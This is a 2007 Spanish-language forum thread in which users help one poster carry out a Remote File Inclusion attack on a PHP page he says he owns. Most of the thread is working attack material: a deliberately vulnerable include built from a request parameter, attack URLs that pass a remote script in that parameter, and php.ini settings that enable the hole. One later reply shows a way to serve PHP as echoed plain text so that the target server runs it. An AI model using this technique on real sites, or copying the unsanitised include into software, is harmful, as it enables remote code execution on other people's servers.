Ayuda con un RFI

dimitrix · 9 Abril 2007, 22:32 PM

Haber, mi intencion es hacerme un RFI (Remote File incluse) a esta dirección:
http://dimitrix.webcindario.com/prueba/index.php

el codigo del index.php es:

Código [Seleccionar]


<p>Esta web es inCrackeable</p>
<?php
include("$canal.php")
?>

y le quiero hacer un include con este archivo:
http://www.dimitrix.es/canal.php/ que tiene de codigo esto:

Código [Seleccionar]

<html>

<?php
$fp = fopen("archivo.txt","w+");
fclose($fp);
?>

con esto conseguiri crear un archivo llamado archivo.txt en
http://dimitrix.webcindario.com/prueba/

yo lo hago de la siguiente forma:
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.php

pero como que no me va y me da error, como seria¿?

no es nada ilegal ya q los housting son mios.
Gracias.

Zinc · 10 Abril 2007, 03:10 AM

La shell no deberia ser, un archivo de texto?.

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

dimitrix · 10 Abril 2007, 13:03 PM

no por que si te fijas el include pide el archivo canal.php

alone-in-the-chat · 10 Abril 2007, 18:08 PM

Prueba kitandole el ".php"
del final
ademas debes de tener habilitado global register en ON al igual que allow_url_fopen si no no funcionara

Código [Seleccionar]



http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal

saludos

dimitrix · 10 Abril 2007, 19:21 PM

haber para para lo que me has dixo de register ON allow_url:fopen...

seria crear un php.ini y que dentro tenga esto ¿?

register_globals = on
allow_url_fopen = on

Quedaria así ¿?

alone-in-the-chat · 10 Abril 2007, 20:25 PM

Se supone que ya tienes el php.ini
Leete esto

http://www.php.net/manual/en/ini.core.php#ini.register-globals

Azielito · 10 Abril 2007, 21:00 PM

Ponelo asi

Código [Seleccionar]

<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>

y entonces haces

Código [Seleccionar]

index.php?canal=http://www.dimitrix.es/canal

dimitrix · 10 Abril 2007, 21:21 PM

nada de nada, pero gracias a todos.

Universal SAC · 22 Abril 2007, 20:37 PM

Código [Seleccionar]

<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>

Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.

yeikos · 22 Abril 2007, 21:59 PM

Cita de: Zinc en 10 Abril 2007, 03:10 AM
La shell no deberia ser, un archivo de texto?.

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

Cita de: Universal SAC en 22 Abril 2007, 20:37 PM
Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.

Os equivocais, mientras el código se encuentre en texto plano no habrá ningún problema...

Código [Seleccionar]


<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>";
?>

allow_url_include = On